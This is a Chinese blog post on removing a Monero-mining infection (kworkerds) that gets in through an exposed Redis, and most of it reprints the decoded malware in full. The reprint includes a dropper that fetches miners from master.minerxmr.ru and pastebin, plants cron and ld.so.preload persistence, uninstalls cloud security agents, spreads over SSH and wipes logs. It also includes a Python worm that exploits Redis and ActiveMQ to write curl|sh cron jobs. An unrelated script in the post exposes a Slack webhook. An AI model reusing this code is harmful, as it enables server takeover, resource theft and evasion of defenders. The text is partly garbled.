挖矿病毒 解决思路 xmr
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了挖矿病毒 解决思路 xmr相关的知识,希望对你有一定的参考价值。
基本上通过服务器挖矿只能利用cpu的性能了,所以 top查看cpu利用率,但是程序会影藏,让你看不见,解决:删除/usr/local/lib/libntp.so ,后面ssh登录会出现错误提示,解决方法:编辑 .bashrc
检查启动脚本 /etc/cron.d/root 有可能会新建文件夹并影藏,使用ls -a 查看。
检查/tmp路径下文件,删除/tmp/kworkerds
使用top查看pid,kill掉
后面需要注意redis的漏洞,bing 本机ip或者使用的ip ,最好使用其他用户启动redis,我使用的nobody启动。
附上一些代码给有兴趣的朋友研究:
#!/bin/sh
machine=hostname
log_name="/data/logs/nginx/huochaihe.cc.access.log.1"
content=cat "$log_name"|awk ‘{if($9 != 200) print $9"-"$7}‘|sort -rn|uniq -c|awk ‘{if($1 > 10) print $1" "$2}‘|sort -rn
date=date -d yesterday +%Y-%m-%d
prefix=${machine}" "${date}" 非200接口异常信息(超过10次才会展示):
[次数] [错误码]-[URI]
"
suffix="
------------------------------------------------------------------"
content=${prefix}${content}${suffix}
curl -x http://westin.hkv3-h.xduotai.com:11071
-X POST -H ‘Content-type: application/json‘
--data ‘{"channel":"#production_info", "username": "log_notifications", "text": "‘"$content"‘"}‘
https://hooks.slack.com/services/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
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1002 root 20 0 574m 22m 948 S 50.2 0.1 1719:34 kworkerds
6090 root 20 0 574m 20m 936 S 49.9 0.1 855:02.37 kworkerds
14227 root 20 0 574m 35m 944 S 49.9 0.2 21175:02 kworkerds
3069 root 20 0 574m 21m 936 S 49.6 0.1 1351:32 kworkerds
7170 root 20 0 574m 32m 948 S 49.6 0.2 17488:56 kworkerds
10839 root 20 0 574m 22m 936 S 49.6 0.1 1668:19 kworkerds
11155 root 20 0 574m 22m 936 S 49.6 0.1 1669:09 kworkerds
11958 root 20 0 574m 35m 948 S 49.2 0.2 20526:35 kworkerds
root 1922 1 0 Nov06 ? 00:00:07 crond
root 1936 1 0 Nov06 tty1 00:00:00 /sbin/mingetty /dev/tty1
root 1938 1 0 Nov06 tty2 00:00:00 /sbin/mingetty /dev/tty2
root 1940 1 0 Nov06 tty3 00:00:00 /sbin/mingetty /dev/tty3
root 1942 1 0 Nov06 tty4 00:00:00 /sbin/mingetty /dev/tty4
root 1944 1 0 Nov06 tty5 00:00:00 /sbin/mingetty /dev/tty5
root 1946 728 0 Nov06 ? 00:00:00 /sbin/udevd -d
root 1947 728 0 Nov06 ? 00:00:00 /sbin/udevd -d
root 1948 1 0 Nov06 tty6 00:00:00 /sbin/mingetty /dev/tty6
root 13736 1 2 Nov19 ? 00:27:38 ./redis-server *:6379
root 15045 1 0 Nov06 ? 00:16:53 /usr/sbin/vmtoolsd
root 15100 1 0 Nov06 ? 00:00:00 /usr/lib/vmware-vgauth/VGAuthService -s
root 15715 1682 0 Nov19 ? 00:00:00 sshd: [email protected]/0
root 15717 15715 0 Nov19 pts/0 00:00:00 -bash
~============================================***base64解码后的脚本代码===========================================================
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function b() {
pkill -f sourplum
pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg
rm -rf /tmp/qW3xT.2 /tmp/ddgs.3013 /tmp/ddgs.3012 /tmp/wnTKYg /tmp/2t3ik
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/index_bak
rm -rf /tmp/httpd.conf
rm -rf /tmp/httpd.conf
rm -rf /tmp/a7b104c270
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
pkill -f qW3xT.2
pkill -f /usr/bin/.sshd
pkill -f sustes
pkill -f Xbash
rm -rf /var/tmp/j
rm -rf /tmp/j
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/.uninstall /tmp/.python /tmp/.tables /tmp/.mas
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
chattr -i /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-
rm -rf /tmp/kworkerds /var/tmp/kworkerds /var/tmp/config.json /tmp/.systemd-private-
chattr -i /usr/lib/libiacpkmn.so.3 && rm -rf /usr/lib/libiacpkmn.so.3
chattr -i /etc/init.d/nfstruncate && rm -rf /etc/init.d/nfstruncate
chattr -i /bin/nfstruncate && rm -rf /bin/nfstruncate
rm -rf /etc/rc.d/S01nfstruncate /etc/rc.d/rc.d/S01nfstruncate
chattr -i /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc.d/S01acpidtd /etc/rc.d/S01acpidtd /etc/ld.sc.conf
rm -rf /bin/ddus-uidgen /etc/init.d/acpidtd /etc/rc.d/rc.d/S01acpidtd /etc/rc.d/S01acpidtd /etc/ld.sc.conf
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/n64 -o /bin/netstat||wget https://master.minerxmr.ru/One/n64 -O /bin/netstat) && chmod +x /bin/netstat && touch -acmr /bin/sh /bin/netstat && chattr +i /bin/netstat
elif [ "$ARCH" == "i386" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/n32 -o /bin/netstat||wget https://master.minerxmr.ru/One/n32 -O /bin/netstat) && chmod +x /bin/netstat && touch -acmr /bin/sh /bin/netstat && chattr +i /bin/netstat
else
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/n32 -o /bin/netstat||wget https://master.minerxmr.ru/One/n32 -O /bin/netstat) && chmod +x /bin/netstat && touch -acmr /bin/sh /bin/netstat && chattr +i /bin/netstat
fi
ps auxf|grep -v grep|grep -v "_" |grep -v "kthreadd" |grep "[.*]"|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xig" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "ddgs" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "qW3xT" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "t00ls.ru" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "/var/tmp/sustes" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "sustes" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "Xbash" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "hashfish" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "cranbery" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "stratum" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "xmr" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep "minerd" | awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep /tmp/thisxxs|awk ‘{print $2}‘|xargs kill
ps auxf|grep -v grep|grep /opt/yilu/work/xig/xig|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep /opt/yilu/mservice|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|grep /usr/bin/.sshd|awk ‘{print $2}‘|xargs kill -9
ps auxf|grep -v grep|rep /usr/bin/bsd-port/getty | awk ‘{print $2}‘|xargs kill -9
netstat -anp | grep 69.28.55.86:443 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep 140.82.52.87 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :3333 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :4444 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :5555 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :6666 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :7777 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :3347 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :14444 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
netstat -anp | grep :14433 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)
if [ ${p} -eq 0 ];then
netstat -anp | grep :56415 |awk ‘{print $7}‘| awk -F‘[/]‘ ‘{print $1}‘ | xargs kill -9
ps auxf|grep -v grep | awk ‘{if($3>=80.0) print $2}‘| xargs kill -9
fi
}
function d() {
ps=$(netstat -an | grep :56415 | wc -l)
if [ ${ps} -eq 0 ];then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/1 -o /tmp/kworkerds||wget https://master.minerxmr.ru/One/1 -O /tmp/kworkerds) && chmod +x /tmp/kworkerds
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
sleep 10
}
function e() {
mkdir -p /var/tmp
chmod 1777 /var/tmp
pm=$(netstat -an | grep :56415 | wc -l)
if [ ${pm} -eq 0 ];then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/c -o /var/tmp/config.json||wget https://master.minerxmr.ru/One/c -O /var/tmp/config.json) && chmod +x /var/tmp/config.json
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/x1 -o /var/tmp/kworkerds||wget https://master.minerxmr.ru/One/x1 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
elif [ "$ARCH" == "i386" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/x2 -o /var/tmp/kworkerds||wget https://master.minerxmr.ru/One/x2 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
else
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/x1 -o /var/tmp/kworkerds||wget https://master.minerxmr.ru/One/x1 -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
fi
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
fi
}
function f() {
nohup python -c "import base64;exec(base64.b64decode(‘I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2hRWlRGQWRDJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz‘))"
#coding: utf-8
import urllib
import base64
d= ‘https://pastebin.com/raw/hQZTFAdC‘
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
==================
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
import os
IP_LIST = []
class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect_ex((self.host, 8161))
s.send(‘google spider
‘)
results = s.recv(1)
if str(results):
data = "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
##"
data2 = "*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
##"
conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
conn.request(method=‘PUT‘, url=‘/fileserver/go.txt‘, body=data)
conn.request(method=‘PUT‘, url=‘/fileserver/goa.txt‘, body=data2)
conn.request(method=‘PUT‘, url=‘/fileserver/gob.txt‘, body=data2)
result = conn.getresponse()
conn.close()
if result.status == 204:
headers = {‘Destination‘: ‘file:///etc/cron.d/root‘}
headers2 = {‘Destination‘: ‘file:///var/spool/cron/root‘}
headers3 = {‘Destination‘: ‘file:///var/spool/cron/crontabs/root‘}
conn = httplib.HTTPConnection(self.host, port=8161, timeout=2)
conn.request(method=‘MOVE‘, url=‘/fileserver/go.txt‘, headers=headers)
conn.request(method=‘MOVE‘, url=‘/fileserver/goa.txt‘, headers=headers2)
conn.request(method=‘MOVE‘, url=‘/fileserver/gob.txt‘, headers=headers3)
conn.close()
s.close()
except Exception:
pass
try:
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.settimeout(2)
x = s2.connect_ex((self.host, 6379))
if x == 0:
s2.send(‘config set stop-writes-on-bgsave-error no
‘)
s2.send(‘flushall
‘)
s2.send(‘config set dbfilename root
‘)
s2.send(‘set SwE3SC "\t\n*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n\t"
‘)
s2.send(‘set NysX7D "\t\n*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh\n\t"
‘)
s2.send(‘config set dir /etc/cron.d
‘)
s2.send(‘save
‘)
s2.send(‘config set dir /var/spool/cron
‘)
s2.send(‘save
‘)
s2.send(‘config set dir /var/spool/cron/crontabs
‘)
s2.send(‘save
‘)
s2.send(‘flushall
‘)
s2.send(‘config set stop-writes-on-bgsave-error yes
‘)
s2.close()
except Exception:
pass
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()
def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()
newthread = staticmethod(newthread)
def get_ip_list():
try:
url = ‘ident.me‘
conn = httplib.HTTPConnection(url, port=80, timeout=10)
conn.request(method=‘GET‘, url=‘/‘, )
result = conn.getresponse()
ip1 = result.read()
ips1 = findall(r‘d+.d+.‘, ip1)[0]
for u in range(0, 256):
ip_list1 = (ips1 + (str(u)))
for g in range(1, 256):
IP_LIST.append(ip_list1 + ‘.‘ + (str(g)))
except Exception:
ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk ‘{print $2}‘|tr -d "addr:"").readline().rstrip()
ips2 = findall(r‘d+.d+.‘, ip2)[0]
for i in range(0, 255):
ip_list2 = (ips2 + (str(i)))
for g in range(1, 255):
IP_LIST.append(ip_list2 + ‘.‘ + (str(g)))
pass
def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()
if name == "main":
runPortscan()
=======================
/dev/null 2>&1 &
touch /tmp/.38t9guft0055d0565u444gtjr0
}
function c() {
chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/CnPtQ2tM -o /usr/local/bin/dns||wget https://pastebin.com/raw/CnPtQ2tM -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns
echo -e "SHELL=/bin/sh
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 root run-parts /etc/cron.hourly
02 4 root run-parts /etc/cron.daily
0 1 root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab
echo -e "/10 root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root
echo -e "/17 root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache
echo -e "/23 (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "/31 (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.hourly/oanacroner||wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.daily/oanacroner||wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner
mkdir -p /etc/cron.monthly
(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/1NtRkBc3 -o /etc/cron.monthly/oanacroner||wget https://pastebin.com/raw/1NtRkBc3 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner
mkdir -p /usr/local/lib/
if [ ! -f "/usr/local/lib/libntpd.so" ]; then
ARCH=$(uname -i)
if [ "$ARCH" == "x86_64" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.minerxmr.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
elif [ "$ARCH" == "i386" ]; then
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.minerxmr.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
else
(curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.minerxmr.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so
fi
fi
echo /usr/local/lib/libntpd.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload && chattr +i /etc/ld.so.preload
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh‘ & done
fi
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.monthly/oanacroner
}
function a() {
if ps aux | grep -i ‘[a]liyun‘; then
wget http://update.aegis.aliyun.com/download/uninstall.sh
chmod +x uninstall.sh
./uninstall.sh
wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh
chmod +x quartz_uninstall.sh
./quartz_uninstall.sh
rm -f uninstall.sh quartz_uninstall.sh
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*;
elif ps aux | grep -i ‘[y]unjing‘; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
touch /tmp/.a
}
mkdir -p /tmp
chmod 1777 /tmp
if [ ! -f "/tmp/.a" ]; then
a
fi
b
c
d
port=$(netstat -an | grep :56415 | wc -l)
if [ ${port} -eq 0 ];then
e
fi
if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then
f
fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
以上是关于挖矿病毒 解决思路 xmr的主要内容,如果未能解决你的问题,请参考以下文章